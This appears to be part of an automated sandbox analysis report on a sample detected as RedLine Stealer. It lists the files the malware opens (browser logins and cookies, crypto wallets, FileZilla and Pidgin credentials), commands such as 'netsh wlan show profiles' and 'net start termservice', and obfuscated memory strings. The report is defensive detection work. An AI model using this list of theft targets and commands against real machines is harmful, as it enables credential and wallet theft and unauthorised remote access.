Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxxLiberty`,jq
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLRjq
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLRjqL
Source: explorer.exe, 00000004.00000002.3545928795.000000000AA28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: metroexodus.exe
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq%appdata%`,jqdC:\Users\user\AppData\Roaming`,jqdC:\Users\user\AppData\Roaming\Binance
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLRjqL
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq&%localappdata%\Coinomi\Coinomi\walletsLRjq
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 0000001F.00000002.2637613775.00007FF848780000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal WLAN passwords

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Windows\System32\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\BGyrAWawDeMTcIdcViWNDxvVFplcVQNCSzhMZfEKcqjQHnGwGkZEqIjldUPMmMbvOydmBpQ\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\BGyrAWawDeMTcIdcViWNDxvVFplcVQNCSzhMZfEKcqjQHnGwGkZEqIjldUPMmMbvOydmBpQ\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml

Source: Yara match	File source: 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3006898229.00000000034C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, type: DROPPED

Contains functionality to start a terminal service

Source: explorer.exe, 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: EC2F.tmp.gfx.exe	String found in binary or memory: net start termservice
Source: EC2F.tmp.gfx.exe, 00000012.00000003.2327914131.0000000004471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: EC2F.tmp.gfx.exe, 00000012.00000003.2327914131.0000000004471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: EC2F.tmp.gfx.exe, 00000012.00000000.2315198488.00000000006E1000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: net start termservice
Source: EC2F.tmp.gfx.exe, 00000012.00000000.2315198488.00000000006E1000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: EC2F.tmp.gfx.exe, 00000012.00000002.2331733029.00000000006E1000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: net start termservice
